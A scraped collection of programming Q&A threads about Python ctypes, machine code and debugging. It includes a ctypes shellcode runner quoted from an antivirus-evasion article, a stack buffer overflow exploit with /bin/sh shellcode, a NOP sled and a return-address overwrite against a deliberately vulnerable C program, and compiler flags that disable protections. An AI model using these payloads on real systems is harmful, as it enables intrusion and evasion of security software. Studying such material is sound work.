ctypes: Cast string to function?

ctypes: Cast string to function? - python

I was reading the article Tips for Evading Anti-Virus During Pen Testing and was surprised by given Python program:
from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00....'
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
The shellcode is shortened. Can someone explain what is going on? I'm familiar with both Python and C, I've tried read on the ctypes module, but there are two main questions left:
What is stored in shellcode?
I know this has something to do with C (in the article it is an shellcode from Metasploit and a different notation for ASCII was chosen), but I cannot identify whether if it's C source (probably not) or originates from some sort of compilation (which?).
Depending on the first question, what's the magic happening during the cast?

Have a look at this shellcode, I toke it from here (it pops up a MessageBoxA):
#include <stdio.h>
typedef void (* function_t)(void);
unsigned char shellcode[] =
"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0";
void real_function(void) {
puts("I'm here");
}
int main(int argc, char **argv)
{
function_t function = (function_t) &shellcode[0];
real_function();
function();
return 0;
}
Compile it an hook it under any debugger, I'll use gdb:
> gcc shellcode.c -o shellcode
> gdb -q shellcode.exe
Reading symbols from shellcode.exe...done.
(gdb)
>
Disassemble the main function to see that different between calling real_function and function:
(gdb) disassemble main
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function> ; <- here we call our `real_function`
0x004013bb <+27>: mov 0xc(%esp),%eax
0x004013bf <+31>: call *%eax ; <- here we call the address that is loaded in eax (the address of the beginning of our shellcode)
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
There are two call, let's make a break point at <main+31> to see what is loaded in eax:
(gdb) break *(main+31)
Breakpoint 1 at 0x4013bf
(gdb) run
Starting program: shellcode.exe
[New Thread 2856.0xb24]
I'm here
Breakpoint 1, 0x004013bf in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function>
0x004013bb <+27>: mov 0xc(%esp),%eax
=> 0x004013bf <+31>: call *%eax ; now we are here
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
Look at the first 3 bytes of the data that the address in eax continues:
(gdb) x/3x $eax
0x402000 <shellcode>: 0xfc 0x33 0xd2
(gdb) ^-------^--------^---- the first 3 bytes of the shellcode
So the CPU will call 0x402000, the beginning of our shell code at 0x402000, lets disassemble what ever at 0x402000:
(gdb) disassemble 0x402000
Dump of assembler code for function shellcode:
0x00402000 <+0>: cld
0x00402001 <+1>: xor %edx,%edx
0x00402003 <+3>: mov $0x30,%dl
0x00402005 <+5>: pushl %fs:(%edx)
0x00402008 <+8>: pop %edx
0x00402009 <+9>: mov 0xc(%edx),%edx
0x0040200c <+12>: mov 0x14(%edx),%edx
0x0040200f <+15>: mov 0x28(%edx),%esi
0x00402012 <+18>: xor %ecx,%ecx
0x00402014 <+20>: mov $0x18,%cl
0x00402016 <+22>: xor %edi,%edi
0x00402018 <+24>: xor %eax,%eax
0x0040201a <+26>: lods %ds:(%esi),%al
0x0040201b <+27>: cmp $0x61,%al
0x0040201d <+29>: jl 0x402021 <shellcode+33>
....
As you see, a shellcode is nothing more than assembly instructions, the only different is in the way you write these instructions, it uses special techniques to make it more portable, for example never use a fixed address.
The python equivalent to the above program:
#!python
from ctypes import *
shellcode_data = "\
\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B\
\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9\
\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C\
\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0\
\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\
\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72\
\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03\
\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\
\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\
\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\
\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66\
\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14\
\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72\
\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\
\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01\
\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65\
\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B\
\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42\
\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24\
\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57\
\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01\
\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F\
\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24\
\x40\xFF\x54\x24\x40\x57\xFF\xD0"
shellcode = c_char_p(shellcode_data)
function = cast(shellcode, CFUNCTYPE(None))
function()

shellcode , if I'm not mistaken, contains architecture-specific compiled code that roughly translates as a function call. (not an architecture expert, and the code is truncated...)
Therefore, once you've created a C-style string with create_string_buffer, you can then fool python into thinking that it is a function with the cast call. Python then executes the code originally contained in shellcode.
There's a helpful link here: http://www.blackhatlibrary.net/Python#Ctypes

Let us not forget that in order to have executable code, it has to be converted to a format that your machine understands. What you are doing there is providing a sequence of byte codes that can be interpreted by your machine, so you can tell your machine to execute it. You are effectively skipping the job of a compiler by providing the final byte codes; this technique is common in Just-In-Time compilers which have to create executable code while the program is running.
So, this actually have little to none relation to C (or Python, or any other language), but has a huge relation to the details of the architecture this code is expected to run at.
The first byte code there is CLD (0xfc) followed by a CALL instruction (0xe8) which makes the code jump to the address based on the offset specified in the next 4 bytes in this bytecode sequence, and so on.

Related

Changing Python integer in memory using ctypes module and GDB session

My question is based on this reddit post. The example there shows how to change an integer in memory using cast function from the ctypes module:
>>> import ctypes
>>> ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[3] = 100
>>> 29
100
I'm interested in the low level internals here and I've checked this in GDB session by setting a breakpoint on the cast function in CPython:
(gdb) break cast
Function "cast" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (cast) pending.
(gdb) run test.py
Starting program: /root/.pyenv/versions/3.8.0-debug/bin/python test.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
0x7ffff00e7b40
Breakpoint 1, cast (ptr=0x9e6e40 <small_ints+1088>, src=10382912, ctype=<_ctypes.PyCPointerType at remote 0xa812a0>) at /root/.pyenv/sources/3.8.0-debug/Python-3.8.0/Modules/_ctypes/_ctypes.c:5540
5540 if (0 == cast_check_pointertype(ctype))
(gdb) p *(PyLongObject *) ptr
$38 = {
ob_base = {
ob_base = {
ob_refcnt = 12,
ob_type = 0x9b8060 <PyLong_Type>
},
ob_size = 1
},
ob_digit = {100}
}
(gdb) p *((long *) ptr + 3)
$39 = 100
(gdb) p ((long *) ptr + 3)
$40 = (long *) 0x9e6e58 <small_ints+1112>
(gdb) p *((char *) ptr + 3 * 8)
$41 = 100 'd'
(gdb) p ((char *) ptr + 3 * 8)
$42 = 0x9e6e58 <small_ints+1112> "d"
(gdb) set *((long *) ptr + 3) = 29
(gdb) p *((long *) ptr + 3)
$46 = 29
(gdb) p *((char *) ptr + 3 * 8)
$47 = 29 '\035'
I would like to know if it's possible to get the memory address using Python in the GDB session because I couldn't access the returned addresses:
(gdb) python print("{:#x}".format(ctypes.addressof(ctypes.c_int(29))))
0x7f1053c947f0
(gdb) python print("{:#x}".format(id(29)))
0x22699d8
(gdb) p *0x7f1053c947f0
Cannot access memory at address 0x7f1053c947f0
(gdb) p *0x22699d8
Cannot access memory at address 0x22699d8
The indexing is also different compeering to Python REPL, I guess this is related to endianness?
(gdb) python print(ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[3])
9
(gdb) python print (ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[2])
29
Questions:
Why memory addresses from Python in GDB session are not accessible, values are not in the the process memory range (info proc mappings)?
Why the indexing is different comparing to Python REPL?
(bonus question) I would expect that the src parameter in the CPython cast function holds the address of the object but it seems to be ptr instead and after memcpy result->b_ptr points to a different value than &ptr? Is this were the actual casting happens?

Your Python process is not a real python process, rather, GDB is running a Python REPL for you. Imagine it as another thread inside of GDB. Of course, this is a simplification, you should see the docs
I was unable to reproduce this behaviour:
(gdb) python
>import ctypes
>print(ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[3])
>end
29
I can't think of any reason this behaviour would happen (least of all endianness, which is the same across your entire system*)
The src parameter appears to be used as the origin type, rather than the origin object. For reference, see ctypes.h and ctypes/__init__.py (_SimpleCData is just CDataObject with some helpers like indexing and repr). And yes, the memcpy is what does the actual casting in this case, although if you are casting between two data types, there is additional work beforehand.
* Except on ARM, where you can change endianness with an instruction

Ctypes executes callback function, then incorrectly calls the dll again

I wrote a dll in NASM to be called from Python using ctypes. I created a short Python callback program within my ctypes wrapper:
def LibraryCall(a):
b = math.ceil(a)
return b
I know the dll calls the callback function because when I step through the ctypes wrapper, the cursor jumps to the callback function, performs the callback, and returns to call the dll again, which seems to be the problem.
The Python ctypes code is:
def SimpleTestFunction_asm(X):
Input_Length_Array = []
Input_Length_Array.append(len(X))
CA_X = (ctypes.c_double * len(X))(*X)
length_array_out = (ctypes.c_double * len(Input_Length_Array)) (*Input_Length_Array)
hDLL = ctypes.WinDLL ("C:/Test_Projects/SimpleTestFunction/SimpleTestFunction.dll")
CallName = hDLL.Main_Entry_fn
CallName.argtypes = [ctypes.POINTER (ctypes.c_double),ctypes.POINTER(ctypes.c_double),ctypes.POINTER (ctypes.c_longlong)]
CallName.restype = ctypes.c_int64
#__________
#The callback function
LibraryCB = ctypes.WINFUNCTYPE(ctypes.c_double, ctypes.c_double)
def LibraryCall(a): #CALLBACK FUNCTION IN PYTHON
b = math.ceil(a)
return b
lib_call = LibraryCB(LibraryCall)
lib_call = ctypes.cast(lib_call,ctypes.POINTER(ctypes.c_longlong))
#__________
ret_ptr = CallName(CA_X, length_array_out, lib_call) ; CALL TO DLL
a = ret_ptr[:2]
n0 = ctypes.cast(a[0],ctypes.POINTER(ctypes.c_double))
n0_size = int(a[0+1] / 8)
x0 = n0[:n0_size]
When I step through the program, what happens now is that the cursor jumps from the line marked "CALL TO DLL" to the line marked "CALLBACK FUNCTION IN PYTHON." It executes the Python callback program correctly, then the cursor jumps back to the line marked "CALL TO DLL" at which point it crashes with no error message. It seems like it returns back to call the DLL again, but I want it to execute the callback function and return the result back to the already-called DLL.
Here is the simple NASM test code:
; Header Section
[BITS 64]
[default rel]
export Main_Entry_fn
export FreeMem_fn
extern malloc, realloc, free
section .data align=16
[DATA SECTION OMITTED FOR BREVITY]
section .text
SimpleTestFunction_fn:
xor rcx,rcx
mov [loop_counter_401],rcx
label_401:
lea rdi,[rel X_ptr]
mov rbp,qword [rdi] ; Pointer
mov rcx,[loop_counter_401]
mov rax,[X_length]
cmp rcx,rax
jge exit_label_for_SimpleTestFunction_fn
movsd xmm0,qword[rbp+rcx]
movsd [x_var],xmm0
;______
movsd xmm1,[const_40]
mulsd xmm0,xmm1
movsd [a],xmm0
movsd xmm0,[a]
call [CB_Pointer] ; THIS IS THE CALL TO THE CALLBACK FUNCTION
movsd [b],xmm0
ret
;__________
;Free the memory
FreeMem_fn:
;The pointer is passed back in rcx (of course)
sub rsp,40
call free
add rsp,40
ret
; __________
; Main Entry
Main_Entry_fn:
push rdi
push rbp
mov [X_ptr],rcx
mov [data_master_ptr],rdx
mov [CB_Pointer],r8
; Now assign lengths
lea rdi,[data_master_ptr]
mov rbp,[rdi]
xor rcx,rcx
movsd xmm0,qword[rbp+rcx]
cvttsd2si rax,xmm0
mov [X_length],rax
add rcx,8
; __________
; malloc for dynamic arrays
lea rdi,[data_master_ptr]
mov rbp,[rdi]
movsd xmm0,qword[rbp]
cvttsd2si rax,xmm0
mov [initial_dynamic_length],rax
mov rcx,qword[initial_dynamic_length] ; Initial size
xor rax,rax
sub rsp,40
call malloc
mov qword [collect_ptr],rax
add rsp,40
mov rax,[initial_dynamic_length]
mov [collect_length],rax
; __________
call SimpleTestFunction_fn
exit_label_for_Main_Entry_fn:
pop rbp
pop rdi
ret
I have already confirmed that the problem is not in the dll, because it returns to Python at the line where it calls the callback function, but it does not return a value to the dll after it executes the callback function; instead, it calls the dll again.
So to sum it up, after the call to the callback function, ctypes returns to call the dll again, which is not what I want.
Thanks very much for an ideas on how to solve this.

The simple answer to this question is that the return must be in parentheses: return (b). With that, it works correctly.
However, there is now a problem with ctypes crashing on exit. I posted that as a separate question at Python ctypes callback crashes on exit with exception code c0000005.
Thanks.

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

C function name-dependent segfault with Python ctypes

I'm getting a really weird crash when using ctypes in Python, but I'm not sure if the problem comes from Python or C.
Here is the C source (in test.c):
#include <stdio.h>
void compress(char *a, int b) {
printf("inside\n");
}
void run() {
printf("before\n");
compress("hi", 2);
printf("after\n");
}
Then here's what happens when I call run() with ctypes:
$ python -c 'import ctypes; ctypes.cdll.LoadLibrary("./test.so").run()'
before
Segmentation fault (core dumped)
The weirdest thing is that the crash doesn't happen when I rename compress() to anything else.
Other things that prevent it from crashing:
Calling compress() directly
Calling run() or compress() from C directly (If I add a main(), compile it directly, and execute it)
Removing either argument from the signature of compress() (but then the function doesn't seem to execute, based on the lack of "inside" being printed.
I'm pretty new to C, so I'm assuming there's something I'm missing here. What could be causing this?
System info:
Python 2.7.6
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04)
Ubuntu 14.04
uname -r: 3.13.0-58-generic

According to the debugging, the program is trying to call compress in libz.so.1.
$ gdb python -c core
...
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `python -c import ctypes; ctypes.cdll.LoadLibrary("./test.so").run()'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007f9ddea18bff in compress2 () from /lib/x86_64-linux-gnu/libz.so.1
which accepts different parameters (zlib.h):
ZEXTERN int ZEXPORT compress OF((Bytef *dest, uLongf *destLen,
const Bytef *source, uLong sourceLen));
ZEXTERN int ZEXPORT compress2 OF((Bytef *dest, uLongf *destLen,
const Bytef *source, uLong sourceLen,
int level));
/*
You can modify the compress function to be static to work around the issue:
static void compress(char *a, int b)
{
printf("inside\n");
}

While #falsetru has diagnosed the problem, his solution won't work in the general case where you have a lot of files to statically link together (because the entire point of declaring things static is to not have them visible from other files).
And while #eryksun has posted a solution for when you want to declare a function the same name as another, in general, you may have a lot of C functions you don't want to export, and you don't want to have to worry about whether they collide with some random function in some library that Python happens to import, and you don't want to have to prefix every one of your internal functions with an attribute.
(GCC maintains documentation on function attributes, including this function visibility feature.)
A more general solution to avoiding namespace collisions is to tell the linker not to export any symbols by default, and then to mark only those functions you want exported, like run(), as visible.
There is probably a standard way to define the macro for this, but my C is so out-of-date I wouldn't know it. In any case, this will work:
#include <stdio.h>
#define EXPORT __attribute__((visibility("protected")))
void compress(char *a, int b) {
printf("inside\n");
}
EXPORT void run() {
printf("before\n");
compress("hi", 2);
printf("after\n");
}
You can link and run it like this:
$ gcc -x c test.c --shared -fvisibility=hidden -o test.so
$ python -c 'import ctypes; ctypes.cdll.LoadLibrary("./test.so").run()'
before
inside
after

How can I call inlined machine code in Python on Linux?

I'm trying to call inlined machine code from pure Python code on Linux. To this end, I embed the code in a bytes literal
code = b"\x55\x89\xe5\x5d\xc3"
and then call mprotect() via ctypes to allow execution of the page containing the code. Finally, I try to use ctypes to call the code. Here is my full code:
#!/usr/bin/python3
from ctypes import *
# Initialise ctypes prototype for mprotect().
# According to the manpage:
# int mprotect(const void *addr, size_t len, int prot);
libc = CDLL("libc.so.6")
mprotect = libc.mprotect
mprotect.restype = c_int
mprotect.argtypes = [c_void_p, c_size_t, c_int]
# PROT_xxxx constants
# Output of gcc -E -dM -x c /usr/include/sys/mman.h | grep PROT_
# #define PROT_NONE 0x0
# #define PROT_READ 0x1
# #define PROT_WRITE 0x2
# #define PROT_EXEC 0x4
# #define PROT_GROWSDOWN 0x01000000
# #define PROT_GROWSUP 0x02000000
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4
# Machine code of an empty C function, generated with gcc
# Disassembly:
# 55 push %ebp
# 89 e5 mov %esp,%ebp
# 5d pop %ebp
# c3 ret
code = b"\x55\x89\xe5\x5d\xc3"
# Get the address of the code
addr = addressof(c_char_p(code))
# Get the start of the page containing the code and set the permissions
pagesize = 0x1000
pagestart = addr & ~(pagesize - 1)
if mprotect(pagestart, pagesize, PROT_READ|PROT_WRITE|PROT_EXEC):
raise RuntimeError("Failed to set permissions using mprotect()")
# Generate ctypes function object from code
functype = CFUNCTYPE(None)
f = functype(addr)
# Call the function
print("Calling f()")
f()
This code segfaults on the last line.
Why do I get a segfault? The mprotect() call signals success, so I should be permitted to execute code in the page.
Is there a way to fix the code? Can I actually call the machine code in pure Python and inside the current process?
(Some further remarks: I'm not really trying to achieve a goal -- I'm trying to understand how things work. I also tried to use 2*pagesize instead of pagesize in the mprotect() call to rule out the case that my 5 bytes of code fall on a page boundary -- which should be impossible anyway. I used Python 3.1.3 for testing. My machine is an 32-bit i386 box. I know one possible solution would be to create a ELF shared object from pure Python code and load it via ctypes, but that's not the answer I'm looking for :)
Edit: The following C version of the code is working fine:
#include <sys/mman.h>
char code[] = "\x55\x89\xe5\x5d\xc3";
const int pagesize = 0x1000;
int main()
{
mprotect((int)code & ~(pagesize - 1), pagesize,
PROT_READ|PROT_WRITE|PROT_EXEC);
((void(*)())code)();
}
Edit 2: I found the error in my code. The line
addr = addressof(c_char_p(code))
first creates a ctypes char* pointing to the beginning of the bytes instance code. addressof() applied to this pointer does not return the address this pointer is pointing to, but rather the address of the pointer itself.
The simplest way I managed to figure out to actually get the address of the beginning of the code is
addr = addressof(cast(c_char_p(code), POINTER(c_char)).contents)
Hints for a simpler solution would be appreciated :)
Fixing this line makes the above code "work" (meaning it does nothing instead of segfaulting...).

I did a quick debug on this and it turns out the pointer to the code is
not being correctly constructed, and somewhere internally ctypes is munging
things up before passing the function pointer to ffi_call() which invokes the
code.
Here is the line in ffi_call_unix64() (I'm on 64-bit) where the function pointer is saved
into %r11:
57 movq %r8, %r11 /* Save a copy of the target fn.
When I execute your code, here is the value loaded into %r11 just before
it attempts the call:
(gdb) x/5b $r11
0x7ffff7f186d0: -108 24 -122 0 0
Here is the fix to construct the pointer and call the function:
raw = b"\x55\x89\xe5\x5d\xc3"
code = create_string_buffer(raw)
addr = addressof(code)
Now when I run it I see the correct bytes at that address, and the function
executes fine:
(gdb) x/5b $r11
0x7ffff7f186d0: 0x55 0x89 0xe5 0x5d 0xc3

You might have to flush the instruction cache.
It is unclear (to me, anyway) whether mprotect() automatically does this.
[update]
Of course, had I read the documentation for cacheflush(), I would have seen that it only applies on MIPS (according to the man page).
Assuming this is x86, you might have to invoke the WBINVD (or CLFLUSH) instruction.
In general, self-modifying code needs to flush the i-cache, but as far as I can tell there is no remotely portable way to do so.

I'd suggest you try to get your code working in C first, then translate to ctypes. There's also something like CorePy if you just want to be able to execute assembly from Python.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.